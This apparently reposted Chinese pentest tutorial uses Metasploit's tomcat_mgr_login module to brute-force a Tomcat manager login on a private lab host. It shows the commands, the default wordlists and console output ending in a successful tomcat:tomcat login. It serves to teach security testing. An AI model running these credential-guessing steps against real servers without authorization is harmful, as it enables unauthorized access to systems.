zoukankan      html  css  js  c++  java
  • 安全测试18渗透攻击Tomcat服务

    1、打开msfconsole控制台

    msfconsole

     2、搜索有效的Tomcat模块

    msf > search tomcat

     这里我们选择使用模块auxiliary/scanner/http/tomcat_mgr_login 

    3.使用Tomcat管理登录模块进行渗透攻击,执行命令如下:

    msf6 > use auxiliary/scanner/http/tomcat_mgr_login

     4,查看tomcat_mgr_login模块有效选项,执行命令

    msf auxiliary(scanner/http/tomcat_mgr_login) > show options 

    5.指定用户名和密码文件,这里使用默认路径

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
    user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    msf6 auxiliary(scanner/http/tomcat_mgr_login) > 

    6.指定要攻击的目标服务器

    msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

    7.设置服务器端口号为8180

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
    rport => 8180
    msf6 auxiliary(scanner/http/tomcat_mgr_login) > 

    8,运行渗透程序

    msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 
    
    [!] No active DB -- Credential data will not be saved!
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
    [+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

     从结果中可以看到找到的账号密码为tomcat,tomcat

    更多技术请关注微信公众号:程序员技术前沿
  • 相关阅读:
    SCHTASKS /CREATE
    手机酷派4G5316 5313s 黑砖 求转成功 9008端口 9006端口 少走弯路选对镜像
    网络共享 相关知识与原理 操作步骤
    电脑 主板 硬盘的 电脑系统
    按键精灵 按键代码
    win7 快捷键 收集
    默认主页更改 主页锁定 打开浏览器时的网页设置
    按键精灵 以时间命名文件夹 创建文件 写入文件 和截图
    按键精灵-----按钮控制(开始子程序)的时候是要用到多线程的
    java web 大总结
  • 原文地址:https://www.cnblogs.com/tiechui2015/p/15715073.html
Copyright © 2011-2022 走看看